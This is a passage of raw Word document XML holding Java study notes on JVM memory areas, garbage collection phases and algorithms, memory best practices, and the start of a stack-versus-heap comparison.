    </w:p>
    <w:p w14:paraId="272FCBF1" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ivided into:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAFB26B" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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Young Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (new objects, short-lived)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C92DB" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5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Eden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747AA942" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5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rvivor Spaces (S0 and S1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC30AE" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ld (Tenured) Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (long-lived objects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA445AB" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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aspace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from Java 8+, stores class metadata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11B5BF" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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Stack Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55762758" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ores method calls, local variables, and references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D03555" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ch thread has its own stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9AD9F7" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Follows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LIFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Last-In-First-Out) model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8BBA3" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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emory is freed automatically when the method ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45332D10" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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Method Area (Metaspace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57549847" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ores class structure like runtime constant pool, field, method data, and bytecode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362B0FC" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hared among all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2CA18A" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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Program Counter (PC) Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373E1DD9" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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tains the address of the current JVM instruction being executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650BEB31" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ch thread has its own PC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A9D15" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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Native Method Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78DFC8" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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for native (non-Java) methods written in C/C++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2DDB7D" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A71AB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B67D8DF">
          <v:rect id="_x0000_i1259" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A3077" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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Java Garbage Collection (GC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153207D8" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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arbage Collector reclaims memory from unreachable objects in Heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63AF4D" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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GC Phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4901E6" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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ark</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Identify which objects are still in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDAC818" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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weep/Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Reclaim memory of unused objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B1E28" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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act</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Rearrange memory to avoid fragmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000AB6A" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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mon GC Algorithms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BCD4E7" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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rial GC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B408221" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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arallel GC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CCE829" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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MS (Concurrent Mark Sweep) – deprecated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F31AE7" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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1 (Garbage First) – default in Java 9+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BD79F" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ZGC &amp; Shenandoah – for low-latency applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BE873" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A71AB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9F7B4FB">
          <v:rect id="_x0000_i1260" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC136A7" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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GC in Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E9653" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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emoryTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E9B6B0" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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5B122AD1" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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or (int i = 0; i &lt; 100000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63018C90" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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new Object(); // Creating objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A4BB9" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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7B7E91F" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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gc(); // Suggest GC to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15774034" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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GC suggested");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6BA9F" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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092344A" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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3ECBC26" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A71AB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E6F672">
          <v:rect id="_x0000_i1261" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFAB94C" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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Best Practices for Memory Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA37AFD" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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void unnecessary object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B228B4" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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appropriate data structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD077B5" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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ullify references if not needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578D06F6" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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 cautious with static references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5850EBA6" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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profiling tools (like VisualVM, JConsole).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B131021" w14:textId="474933F4" w:rsidR="007016EA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007016EA">
      <w:pPr>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7074AE22">
          <v:rect id="_x0000_i1262" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D643D" w14:textId="55F8F255" w:rsidR="004043D8" w:rsidRPr="00CE4B95" w:rsidRDefault="004043D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc196307577"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Stack </w:t>
      </w:r>
      <w:r w:rsidR="00101BB3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Heap memory?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="5687C412" w14:textId="09E9451B" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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tack vs Heap Memory in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3179C181"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nderstanding </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stack</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Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory is essential for writing efficient Java programs and debugging memory-related issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270138F9" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0059733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FA29021">
          <v:rect id="_x0000_i1263" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F36A64" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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1. Stack Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39457889" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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lastRenderedPageBreak/>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E0380" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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ores </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method calls</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local variable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object references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not the actual objects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35491646" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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Memory is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>allocated per thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (each thread has its own stack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE84DED" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Last In First Out (LIFO)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02566A" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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Memory is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically managed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (freed once the method call is complete).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9E7C3" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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aster access compared to heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FD1A14" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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10DE3CDF"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void exampleMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D1F50E"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x = 10;  // stored in stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2DCD8"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name = "Java"; // reference in stack, object in string pool/heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF449B"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387A4A1" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0059733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A8020B4">
          <v:rect id="_x0000_i1264" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3A8C6" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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2. Heap Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EB08A" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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haracteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0037543C" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ores </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>objects</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array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instance variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A73AD1" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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hared across all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B884688" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
